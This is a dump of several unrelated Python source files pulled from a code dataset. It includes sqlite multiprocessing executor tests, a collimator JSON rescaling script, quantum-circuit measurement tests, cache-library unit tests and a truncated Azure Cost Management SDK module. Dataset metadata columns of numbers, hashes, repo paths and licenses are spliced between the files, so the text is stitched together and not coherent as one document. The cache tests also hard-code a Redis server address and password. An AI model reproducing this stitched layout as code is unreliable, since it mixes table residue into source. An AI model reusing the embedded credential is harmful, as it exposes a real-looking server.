thisproc.db_connection = sqlite3.connect(database_fpath)
def database_worker_procstorage(task):
thisproc = mp.current_process()
cursor = thisproc.db_connection.cursor()
query, params = task
time.sleep(random.randrange(1,2))
cursor.execute(query, (params,))
row = cursor.fetchone()
return params, row[0]
def test_background_sqlite3_procstorage():
'''This tests if the persistent DB connections work correctly in background
workers.
'''
temp_fd, temp_fname = tempfile.mkstemp()
conn = sqlite3.connect(temp_fname)
cursor = conn.cursor()
# from https://github.com/jalapic/engsoccerdata
# /blob/master/data-raw/teamnames.csv
data = [
(1,"England","Sutton United","Sutton United"),
(2,"England","Aberdare Athletic","Aberdare Athletic"),
(3,"England","Accrington","Accrington"),
(4,"England","Accrington F.C.","Accrington"),
(5,"England","AFC Bournemouth","AFC Bournemouth"),
(6,"England","AFC Wimbledon","AFC Wimbledon"),
(7,"England","Aldershot","Aldershot Tn."),
(8,"England","Arsenal","Arsenal"),
(9,"England","Aston Villa","Aston Villa"),
]
queries_params_results = [
('select country from team_names where serial = ?',
4,
'England'),
('select team_name from team_names where team_name = ?',
'Arsenal',
'Arsenal'),
('select alt_team_name from team_names where team_name = ?',
'Aldershot',
'Aldershot Tn.'),
('select serial from team_names where team_name = ?',
'Aston Villa',
9),
]*5
param_result_dict = {x[1]:x[2] for x in queries_params_results}
cursor.execute(
"create table team_names ("
"serial integer, country text, team_name text, alt_team_name text"
")"
)
cursor.executemany("insert into team_names values (?,?,?,?)", data)
conn.commit()
conn.close()
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=4,
initializer=database_initializer_procstorage,
initargs=(temp_fname,)
)
print('executor up OK: %r' % executor)
tasks = [(x[0], x[1]) for x in queries_params_results]
futures = [
executor.submit(database_worker_procstorage,task) for task in tasks
]
results = []
for f in as_completed(futures):
results.append(f.result())
for res in results:
input_param, returned = res
assert returned == param_result_dict[input_param], "Result matches"
executor.shutdown()
os.remove(temp_fname)
#############################################
## Testing database closure on worker exit ##
#############################################
def database_initializer_finalizer(database_fpath):
thisproc = mp.current_process()
thisproc.db_connection = sqlite3.connect(database_fpath)
def database_worker_finalizer(task):
thisproc = mp.current_process()
cursor = thisproc.db_connection.cursor()
query, params = task
time.sleep(random.randrange(1,2))
cursor.execute(query, (params,))
row = cursor.fetchone()
return params, row[0]
def database_closer_finalizer():
thisproc = mp.current_process()
thisproc.db_connection.close()
try:
thisproc.db_connection.cursor()
except sqlite3.ProgrammingError as e:
with open('worker-done-%s.txt' % thisproc.name,'w') as outfd:
outfd.write(
'database closed successfully: %r at %s\n' %
(e, datetime.utcnow().isoformat())
)
def test_background_sqlite3_finalizer():
'''This tests if the persistent DB connections work correctly in background
workers.
'''
temp_fd, temp_fname = tempfile.mkstemp()
conn = sqlite3.connect(temp_fname)
cursor = conn.cursor()
# from https://github.com/jalapic/engsoccerdata
# /blob/master/data-raw/teamnames.csv
data = [
(1,"England","Sutton United","Sutton United"),
(2,"England","Aberdare Athletic","Aberdare Athletic"),
(3,"England","Accrington","Accrington"),
(4,"England","Accrington F.C.","Accrington"),
(5,"England","AFC Bournemouth","AFC Bournemouth"),
(6,"England","AFC Wimbledon","AFC Wimbledon"),
(7,"England","Aldershot","Aldershot Tn."),
(8,"England","Arsenal","Arsenal"),
(9,"England","Aston Villa","Aston Villa"),
]
queries_params_results = [
('select country from team_names where serial = ?',
4,
'England'),
('select team_name from team_names where team_name = ?',
'Arsenal',
'Arsenal'),
('select alt_team_name from team_names where team_name = ?',
'Aldershot',
'Aldershot Tn.'),
('select serial from team_names where team_name = ?',
'Aston Villa',
9),
]*5
param_result_dict = {x[1]:x[2] for x in queries_params_results}
cursor.execute(
"create table team_names ("
"serial integer, country text, team_name text, alt_team_name text"
")"
)
cursor.executemany("insert into team_names values (?,?,?,?)", data)
conn.commit()
conn.close()
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=4,
initializer=database_initializer_finalizer,
initargs=(temp_fname,),
finalizer=database_closer_finalizer
)
print('executor up OK: %r' % executor)
tasks = [(x[0], x[1]) for x in queries_params_results]
futures = [
executor.submit(database_worker_finalizer,task) for task in tasks
]
results = []
for f in as_completed(futures):
results.append(f.result())
for res in results:
input_param, returned = res
assert returned == param_result_dict[input_param], "Result matches"
executor.shutdown()
os.remove(temp_fname)
with open('executor-shutdown.txt','w') as outfd:
outfd.write('executor shutdown at: %s\n' %
datetime.utcnow().isoformat())
# now we'll check if the result files were generated correctly
worker_results = glob.glob(os.path.join(os.getcwd(),
'worker-done-*.txt'))
assert len(worker_results) == 4, "All workers cleaned up correctly"
for wrkres in worker_results:
with open(wrkres,'r') as infd:
assert "closed database" in infd.read(), "Clean up result OK"
os.remove(wrkres)
assert os.path.exists(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
os.remove(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
| 27.784854
| 79
| 0.609924
| 1,905
| 16,143
| 5.044619
| 0.135433
| 0.017482
| 0.007492
| 0.022477
| 0.858065
| 0.847138
| 0.844329
| 0.83975
| 0.83975
| 0.830385
| 0
| 0.007742
| 0.231865
| 16,143
| 580
| 80
| 27.832759
| 0.767258
| 0.111503
| 0
| 0.771676
| 0
| 0
| 0.241998
| 0.015116
| 0
| 0
| 0
| 0
| 0.052023
| 1
| 0.057803
| false
| 0.008671
| 0.031792
| 0
| 0.106936
| 0.052023
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 1588325c524b8ac318a55a7b399a336ccae7345f
| 1,124
| py
| Python
| tests/data_test_K2/correct_json_colimators.py
| xsuite/xcol
| 5ca9d49a3a09aeecfa5fc193631ad49f7f582408
| ["Apache-2.0"] | null | null | null
| tests/data_test_K2/correct_json_colimators.py
| xsuite/xcol
| 5ca9d49a3a09aeecfa5fc193631ad49f7f582408
| ["Apache-2.0"] | null | null | null
| tests/data_test_K2/correct_json_colimators.py
| xsuite/xcol
| 5ca9d49a3a09aeecfa5fc193631ad49f7f582408
| ["Apache-2.0"] | null | null | null |
from pathlib import Path
import json
import numpy as np
import xobjects as xo
import xcoll as xc
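# Rescale each collimator's offsets by 1e-3 (presumably mm -> m) and convert the
# angle from radians to degrees, then rewrite the JSON files in place.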
with open(Path(Path.cwd(), 'collimators_B1'), 'r') as fid:
collimators = [ x.strip() for x in fid.readlines()]
for name in collimators:
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'r') as fid:
coll = xc.K2Collimator.from_dict(json.load(fid))
coll.dx *= 1e-3
coll.dy *= 1e-3
coll.dpx *= 1e-3
coll.dpy *= 1e-3
coll.angle *= 180./np.pi
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'w') as fid:
json.dump(coll.to_dict(), fid, cls=xo.JEncoder)
with open(Path(Path.cwd(), 'collimators_B2'), 'r') as fid:
collimators = [ x.strip() for x in fid.readlines()]
for name in collimators:
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'r') as fid:
coll = xc.K2Collimator.from_dict(json.load(fid))
coll.dx *= 1e-3
coll.dy *= 1e-3
coll.dpx *= 1e-3
coll.dpy *= 1e-3
coll.angle *= 180./np.pi
with open(Path(Path.cwd(), 'Collimators',name+'.json'), 'w') as fid:
json.dump(coll.to_dict(), fid, cls=xo.JEncoder)
| 34.060606
| 72
| 0.620107
| 182
| 1,124
| 3.796703
| 0.241758
| 0.034732
| 0.081042
| 0.138929
| 0.879884
| 0.879884
| 0.793054
| 0.793054
| 0.793054
| 0.793054
| 0
| 0.028857
| 0.198399
| 1,124
| 32
| 73
| 35.125
| 0.738069
| 0
| 0
| 0.758621
| 0
| 0
| 0.087189
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.172414
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 01d27c0d0916d9e453ed46c48e1a524781dec69f
| 810
| py
| Python
| tests/test_measurekey.py
| minatoyuichiro/Blueqat
| 1be0150ca48bf40527936561d1bf4687dbf435b4
| ["Apache-2.0"] | 357
| 2019-02-24T07:21:03.000Z
| 2022-03-15T22:59:13.000Z
| tests/test_measurekey.py
| mdrft/blueqat
| 6c5f26b377bc3ce0d02adec8b9132d70870b3d95
| ["Apache-2.0"] | 35
| 2019-03-29T02:13:09.000Z
| 2021-10-15T02:19:06.000Z
| tests/test_measurekey.py
| mdrft/blueqat
| 6c5f26b377bc3ce0d02adec8b9132d70870b3d95
| ["Apache-2.0"] | 49
| 2019-03-09T13:19:40.000Z
| 2022-03-11T08:31:16.000Z
|
from blueqat import Circuit
def test_key0():
assert Circuit().m(key="test")[0].run(shots=10, returns="samples") == [{"test": [0]} for _ in range(10)]
def test_key1():
assert Circuit().x[0].m(key="test")[0].run(shots=10, returns="samples") == [{"test": [1]} for _ in range(10)]
def test_keys():
assert Circuit().x[0].m(key="a")[0, 1].x[0].m(key="b")[0].run(shots=10, returns="samples") == [{"a": [1, 0], "b": [0]} for _ in range(10)]
def test_key_replace():
assert Circuit().x[0].m(key="a")[0, 1].x[0].m(key="a", duplicated="replace")[0].run(shots=10, returns="samples") == [{"a": [0]} for _ in range(10)]
def test_key_append():
assert Circuit().x[0].m(key="a")[0, 1].x[0].m(key="a", duplicated="append")[0].run(shots=10, returns="samples") == [{"a": [1, 0, 0]} for _ in range(10)]
| 38.571429
| 156
| 0.582716
| 144
| 810
| 3.194444
| 0.194444
| 0.069565
| 0.045652
| 0.091304
| 0.815217
| 0.786957
| 0.713043
| 0.613043
| 0.513043
| 0.391304
| 0
| 0.069307
| 0.12716
| 810
| 20
| 157
| 40.5
| 0.58133
| 0
| 0
| 0
| 0
| 0
| 0.091358
| 0
| 0
| 0
| 0
| 0
| 0.454545
| 1
| 0.454545
| true
| 0
| 0.090909
| 0
| 0.545455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 7
| 01ed5b041e73a4cd37b04bd9d88472defdab6b4a
| 29
| py
| Python
| quit/__init__.py
| plewandowska777/QuIT
| 1e1ea4d57e16a6074c123ed01b22ad190384329c
| ["MIT"] | null | null | null
| quit/__init__.py
| plewandowska777/QuIT
| 1e1ea4d57e16a6074c123ed01b22ad190384329c
| ["MIT"] | 1
| 2022-01-25T17:07:51.000Z
| 2022-01-25T17:07:51.000Z
| quit/__init__.py
| plewandowska777/QuIT
| 1e1ea4d57e16a6074c123ed01b22ad190384329c
| ["MIT"] | null | null | null |
def dummy():
return 2137
| 9.666667
| 15
| 0.62069
| 4
| 29
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 0.275862
| 29
| 2
| 16
| 14.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 7
| 01edb32b0a33b2b61637012bf80de2b59a87f082
| 12,655
| py
| Python
| tests/test_unitest.py
| Max1993Liu/wrapcache
| af30bf3609d82b02060861aa739528005c0f527c
| ["MIT"] | 117
| 2016-01-03T14:41:33.000Z
| 2021-07-06T05:48:30.000Z
| tests/test_unitest.py
| Max1993Liu/wrapcache
| af30bf3609d82b02060861aa739528005c0f527c
| ["MIT"] | 8
| 2016-01-07T04:47:56.000Z
| 2020-11-17T07:16:25.000Z
| tests/test_unitest.py
| Max1993Liu/wrapcache
| af30bf3609d82b02060861aa739528005c0f527c
| ["MIT"] | 26
| 2016-01-04T08:48:22.000Z
| 2021-03-15T10:02:02.000Z
|
#-*-coding: utf-8 -*-
import unittest, time
import sys, random
import wrapcache
from wrapcache.adapter.MemoryAdapter import MemoryAdapter
from wrapcache.adapter.RedisAdapter import RedisAdapter
from wrapcache.database import LruCacheDB
#########################Memory test
class TestMemoryInstance:
@wrapcache.wrapcache(timeout = 3, adapter = MemoryAdapter)
def test_cache(self):
return time.time()
@wrapcache.wrapcache(timeout = 3, adapter = MemoryAdapter)
def test_input_cache(self, i, j):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 10, adapter = MemoryAdapter)
def test_input_order_cache(self, i = 1, j = 's'):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 3, adapter = MemoryAdapter)
def need_cache_function(self):
time.sleep(2)
print('cache timeout, new...')
return random.randint(1, 100)
class TestMemoryUnitest(unittest.TestCase):
def setUp(self):
self.test_class = TestMemoryInstance()
def tearDown(self):
pass
def test_cache(self):
val_1 = self.test_class.test_cache()
self.assertEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
def test_input_cache(self):
val_1 = self.test_class.test_input_cache(1, 'hello world')
self.assertEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), self.test_class.test_input_cache(2, 'hello world'), 'test_input_cache fail')
def test_input_order_cache(self):
val_1 = self.test_class.test_input_order_cache(i = 1, j = 'hello world')
self.assertNotEqual(self.test_class.test_input_order_cache(j = 'hello world', i = 1), self.test_class.test_input_order_cache(j = 'hello wrapcache', i = 1), 'test_input_order_cache fail')
def test_keyof_api(self):
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_2 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_3 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello world', i = 1)
key_4 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello wrapcache', i = 1)
self.assertEqual(key_1, key_2, 'test_keyof_api fail')
self.assertEqual(key_1, key_3, 'test_keyof_api fail')
self.assertNotEqual(key_1, key_4, 'test_keyof_api fail')
def test_apis(self):
#get api
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
value_1 = wrapcache.get(key_1)
if not value_1:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#set api
value_2 = wrapcache.set(key_1, 'test_value', timeout = 3)
self.assertEqual(value_2, 'test_value', 'test_keyof_api fail')
#get api / timeout
value_3 = wrapcache.get(key_1)
self.assertEqual(value_3, 'test_value', 'test_keyof_api fail')
time.sleep(3)
value_3 = wrapcache.get(key_1)
if not value_3:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#remove api
value_4 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_4, 'test_value 4', 'test_keyof_api fail')
value_5 = wrapcache.remove(key_1)
self.assertEqual(value_4, value_5, 'test_keyof_api fail')
value_3 = wrapcache.get(key_1)
if not value_5:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#flush api
value_6 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_6, 'test_value 4', 'test_keyof_api fail')
self.assertTrue(wrapcache.flush(), 'test_keyof_api fail')
value_6 = wrapcache.get(key_1)
if not value_6:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
def test_need_cache_function(self):
for i in range(10):
time.sleep(1)
print(self.test_class.need_cache_function())
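# Same test scenarios as TestMemoryUnitest, but with the memory adapter backed by a
# size-limited LRU cache database.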
class TestMemoryLRUUnitest(unittest.TestCase):
def setUp(self):
self.test_class = TestMemoryInstance()
MemoryAdapter.db = LruCacheDB(size = 100)
def tearDown(self):
pass
def test_cache(self):
val_1 = self.test_class.test_cache()
self.assertEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
def test_input_cache(self):
val_1 = self.test_class.test_input_cache(1, 'hello world')
self.assertEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), self.test_class.test_input_cache(2, 'hello world'), 'test_input_cache fail')
def test_input_order_cache(self):
val_1 = self.test_class.test_input_order_cache(i = 1, j = 'hello world')
self.assertNotEqual(self.test_class.test_input_order_cache(j = 'hello world', i = 1), self.test_class.test_input_order_cache(j = 'hello wrapcache', i = 1), 'test_input_order_cache fail')
def test_keyof_api(self):
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_2 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_3 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello world', i = 1)
key_4 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello wrapcache', i = 1)
self.assertEqual(key_1, key_2, 'test_keyof_api fail')
self.assertEqual(key_1, key_3, 'test_keyof_api fail')
self.assertNotEqual(key_1, key_4, 'test_keyof_api fail')
def test_apis(self):
#get api
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
value_1 = wrapcache.get(key_1)
if not value_1:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#set api
value_2 = wrapcache.set(key_1, 'test_value', timeout = 3)
self.assertEqual(value_2, 'test_value', 'test_keyof_api fail')
#get api / timeout
value_3 = wrapcache.get(key_1)
self.assertEqual(value_3, 'test_value', 'test_keyof_api fail')
time.sleep(3)
value_3 = wrapcache.get(key_1)
if not value_3:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#remove api
value_4 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_4, 'test_value 4', 'test_keyof_api fail')
value_5 = wrapcache.remove(key_1)
self.assertEqual(value_4, value_5, 'test_keyof_api fail')
value_3 = wrapcache.get(key_1)
if not value_5:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#flush api
value_6 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_6, 'test_value 4', 'test_keyof_api fail')
self.assertTrue(wrapcache.flush(), 'test_keyof_api fail')
value_6 = wrapcache.get(key_1)
if not value_6:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
def test_need_cache_function(self):
for i in range(10):
time.sleep(1)
print(self.test_class.need_cache_function())
################end memory test
#########################redis test
class TestRedisInstance:
@wrapcache.wrapcache(timeout = 3, adapter = RedisAdapter)
def test_cache(self):
return time.time()
@wrapcache.wrapcache(timeout = 3, adapter = RedisAdapter)
def test_input_cache(self, i, j):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 10, adapter = RedisAdapter)
def test_input_order_cache(self, i = 1, j = 's'):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 3, adapter = RedisAdapter)
def need_cache_function(self):
time.sleep(2)
print('cache timeout, new...')
return random.randint(1, 100)
class TestRedisUnitest(unittest.TestCase):
def setUp(self):
self.test_class = TestRedisInstance()
import redis
#init redis instance
REDIS_CACHE_POOL = redis.ConnectionPool(host = '162.211.225.209', port = 6739, password = 'wzwacxl', db = 2)
REDIS_CACHE_INST = redis.Redis(connection_pool = REDIS_CACHE_POOL, charset = 'utf8')
        RedisAdapter.db = REDIS_CACHE_INST  # initialize the decorator cache
def tearDown(self):
pass
def test_cache(self):
val_1 = self.test_class.test_cache()
self.assertEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
def test_input_cache(self):
val_1 = self.test_class.test_input_cache(1, 'hello world')
self.assertEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), self.test_class.test_input_cache(2, 'hello world'), 'test_input_cache fail')
def test_input_order_cache(self):
val_1 = self.test_class.test_input_order_cache(i = 1, j = 'hello world')
self.assertNotEqual(self.test_class.test_input_order_cache(j = 'hello world', i = 1), self.test_class.test_input_order_cache(j = 'hello wrapcache', i = 1), 'test_input_order_cache fail')
def test_keyof_api(self):
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_2 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_3 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello world', i = 1)
key_4 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello wrapcache', i = 1)
self.assertEqual(key_1, key_2, 'test_keyof_api fail')
self.assertEqual(key_1, key_3, 'test_keyof_api fail')
self.assertNotEqual(key_1, key_4, 'test_keyof_api fail')
def test_apis(self):
#get api
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
value_1 = wrapcache.get(key_1)
if not value_1:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#set api
value_2 = wrapcache.set(key_1, 'test_value', timeout = 3)
self.assertEqual(value_2, 'test_value', 'test_keyof_api fail')
#get api / timeout
value_3 = wrapcache.get(key_1)
self.assertEqual(value_3, 'test_value', 'test_keyof_api fail')
time.sleep(3)
value_3 = wrapcache.get(key_1)
if not value_3:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#remove api
value_4 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_4, 'test_value 4', 'test_keyof_api fail')
value_5 = wrapcache.remove(key_1)
self.assertEqual(value_4, value_5, 'test_keyof_api fail')
value_3 = wrapcache.get(key_1)
if not value_5:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#flush api
value_6 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_6, 'test_value 4', 'test_keyof_api fail')
self.assertTrue(wrapcache.flush(), 'test_keyof_api fail')
value_6 = wrapcache.get(key_1)
if not value_6:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
def test_need_cache_function(self):
for i in range(10):
time.sleep(1)
print(self.test_class.need_cache_function())
################end redis test
if __name__ =='__main__':
unittest.main()
| 41.903974
| 194
| 0.653418
| 1,771
| 12,655
| 4.396386
| 0.055336
| 0.070511
| 0.090162
| 0.104803
| 0.923966
| 0.920755
| 0.920755
| 0.917544
| 0.89738
| 0.882225
| 0
| 0.02662
| 0.22821
| 12,655
| 302
| 195
| 41.903974
| 0.770554
| 0.019597
| 0
| 0.90708
| 0
| 0
| 0.146734
| 0.005362
| 0
| 0
| 0
| 0
| 0.252212
| 1
| 0.141593
| false
| 0.017699
| 0.030973
| 0.026549
| 0.230089
| 0.022124
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| bf08f8e37e370304ef6370c0f8c39be1cc1154d6
| 34,516
| py
| Python
| src/costmanagement/azext_costmanagement/vendored_sdks/costmanagement/operations/_view_operations.py
| Mannan2812/azure-cli-extensions
| e2b34efe23795f6db9c59100534a40f0813c3d95
| ["MIT"] | 207
| 2017-11-29T06:59:41.000Z
| 2022-03-31T10:00:53.000Z
| src/costmanagement/azext_costmanagement/vendored_sdks/costmanagement/operations/_view_operations.py
| Mannan2812/azure-cli-extensions
| e2b34efe23795f6db9c59100534a40f0813c3d95
| ["MIT"] | 4,061
| 2017-10-27T23:19:56.000Z
| 2022-03-31T23:18:30.000Z
| src/costmanagement/azext_costmanagement/vendored_sdks/costmanagement/operations/_view_operations.py
| Mannan2812/azure-cli-extensions
| e2b34efe23795f6db9c59100534a40f0813c3d95
| ["MIT"] | 802
| 2017-10-11T17:36:26.000Z
| 2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ViewOperations(object):
"""ViewOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.costmanagement.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
**kwargs # type: Any
):
# type: (...) -> "models.ViewListResult"
"""Lists all views by tenant and object.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ViewListResult or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.ViewListResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ViewListResult"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
else:
url = next_link
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ViewListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/providers/Microsoft.CostManagement/views'}
def list_by_scope(
self,
scope, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.ViewListResult"
"""Lists all views at the given scope.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ViewListResult or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.ViewListResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ViewListResult"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
else:
url = next_link
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
